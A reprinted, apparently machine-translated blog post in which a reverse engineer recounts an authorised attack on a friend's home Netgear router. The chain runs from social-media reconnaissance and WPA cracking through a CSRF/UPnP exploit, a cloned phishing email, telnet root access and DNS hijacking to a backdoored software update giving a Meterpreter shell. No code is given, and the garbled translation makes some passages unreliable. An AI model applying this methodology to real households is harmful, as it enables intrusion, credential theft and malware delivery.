Penetration Test in the living room: How do hackers intrude into your wireless router?

Recently, serious security vulnerabilities have emerged in wireless router products. The national Internet emergency center reported a large number of security vulnerabilities in home wireless routers, marking a major threat that wireless routers are already known as personal network security.

Why did a wireless router become a hacker overnight? Once the wireless router (home gateway) is controlled, it can monitor and redirect all network traffic in the LAN, including PC, iPad, smartphone, NAS, and even game hosts, the security of the wireless router is poor, and the security patch upgrade is slow, making it easier to solve the problem.

Although wireless routers have common security vulnerabilities, few people know the specific intrusion techniques of hackers.

In fact, for hackers, attacking a personal wireless router is much more difficult than attacking a large company (especially the target has professional information security knowledge and can promptly update the router patch ), because the attack area exposed by individual targets is small. Recently, an Information Security Expert invited Phikshun, a reverse engineer, to intrude into his wireless router. Phikshun's blog post detailed the entire attack process and techniques, which deserves the reference of information security professionals, reprinted as follows:

Some time ago, a friend engaged in information security asked me to do something strange. Let me hack his router. We can call him Bill. For privacy protection, other names and locations will change. However, the supplier name is retained.

It's easy to hack into a large company (maybe ). Their information resources may be distributed around the world. Although they invest in a variety of protection technologies, it is only difficult for us to track everything they do. They have to strictly scan, patch, and restart all assets day after day.

However, it is very difficult to intrude into an individual. Indeed, black hat technology has its advantages in asymmetric information security. Sometimes you only need a bug (you can successfully hack into a large company ). However, compared with large companies, the attack regions exposed by individual targets are very small. In addition, many believe in the information provided by large suppliers, and cloud providers often do so to protect people from attacks.

I started with basic reconnaissance. I like to use Maltego, append websites such as checkusernames.com, knowem.com, and piple search, and other tools to calculate the online status. There are also some classic websites such as Google +, Facebook, and Linkedin. We can use some fake information on Facebook to do this. You need to prepare bait information for your target so that additional information can be extracted through the social media engine.

In terms of online status, password resetting is a very good way (something at your fingertips )". I have seen that some web email account information can be found directly from the target Facebook information. I'm sure most people don't even realize this. They may have forgotten the reset issues they wrote five years ago ). However, these things are useless here. You need to know that my goal is an information security nerd who is expecting me.

It's time to fight with him. First, I checked whether he managed anything on his home network connection. He may have done this before but did not pay attention to it. Many applications and devices use UPnP to punch holes in the consumer-level firewall. Sometimes we only need one NAS or media server to open a backdoor. To find his home IP address, I used a Skype parser, such as resolvme.org. It is great. I scanned his ip address (and the ip addresses of some neighbors) to see if I could find some services. No dice... But I'm sure he thinks I will.

Okay, next, 802.11. Wireless networks are a great attack medium. I have two Radeon 6990's graphics cards on the i7 platform, which are hashed together by the WPA hash. I use a Markov prediction Word Table Generator to provide predictions for oclHashcat. It can reach an average cracking rate of 80% within 8 hours.

So I started with bill's address (using various Alfa wificards ). Actually, I also know the address of Bill. Maybe I have obtained this information through reconnaissance or social media engines. This is not a secret. After successfully capturing a WPA handshake, I ran the cracking tool for a week. This may be useful to most people, but Bill is an information security guy. The WPA key is likely to contain more than 32 characters.

At this point, you may wonder why I didn't use Java's 0-day vulnerability to attack him, and then enjoy my beer. The answer is simple-I know my goal. He is dedicated to scanning, repairing, and repeating spells. I have a browser 0-day vulnerability, And I won it last week.

 

After I visited Bill's website, I left with some useful information. The MAC address (BSSID) of the wireless router: 06: A1: 51: E3: 15: E3. Since I have OUI (the first three bytes of MAC), I know this is the Netgear router. Of course I also know some problems with the Netgear router, but Bill runs the latest firmware. But this does not mean that all vulnerabilities are fixed in the firmware. The only way to determine is to buy a Netgear router and test it in person.

It may not be possible to obtain an accurate model (it cannot be obtained remotely anyway ). Consumer devices may have many variants between different models, because the reference platform comes from Soc vendors such as Broadcom and Atheros. I know that Bill is a little simple, so I chose WNDR3400v3, an entry-level product.

After learning about some weaknesses of the device, I made two Metasploit modules. In the first module, I used a CSRF vulnerability to send a post request to the UPnP interface, and made a hole to access the vro's own remote connection service. This problem exists on many other devices and deserves attention.

If you can use CSRF to spoof UPnP requests, You can overwrite the entire network.

This is a key point. I opened a separate port. You can use Ajax requests from the victim's browser to configure NAT entries for the IP addresses in each subnet to effectively disable the firewall. Of course, there are many hard limits on the number of NAT entries for UPnP, but most devices will allow sufficient entries to map some key ports to around 100 hosts.

To lure Bill into my trap, I sent him an email with a built-in link. Cobalt Strike has a tool to copy an existing Email (subject and all), so it's easy. All I need to do is modify this link. So What emails will be ordered by everyone? Even a guy engaged in information security? -- Invitation.

Edit: Some readers may wonder why Bill liked this. Even a simple check of the sender's domain or link will find a problem. A good excuse is the key to success. As for the background of excuses, let's read this article. In this case, the invitation seemed to have been sent from the afternoon when he had a meeting with someone. Well, there are many informal job interviews. I think this is a confirmation deviation-he is willing to believe that he has got the job.

Before I send this email, I need a tracking load. By default, the telnet port is enabled on the Netgear router, but the service does not respond. You must connect to the port and send a special unlock code. In fact, this vulnerability is publicly exploited, but I wrote another MSF module because I like Ruby (and Metasploit ).

Bill clicked on this link. When I saw the callback, I triggered the second module and then logged on to the vrotelnet through telnet. After obtaining the root access permission of the vro, I immediately changed the DNS settings to direct it to a DNS server under my control.

Controlling DNS is an enjoyable task. It effectively provides you with the man-in-the-middle attack you need. There are many MITM attack carriers, but I still like Evilgrade-because of its privacy. Evilgrade has been around for many years, but it is still great (with some necessary modifications ). I waited about a week before Bill decided to upgrade notepad ++ to the new version. When he did it, he gave me a version with a backdoor, which also provided me with a Meterpreter shell on his computer. I immediately sent an email with a record and a key. A few minutes later, he pulled the plug from the computer.

Finally, I was rewarded with 6 bottles of Ruby beer. I love my Ruby!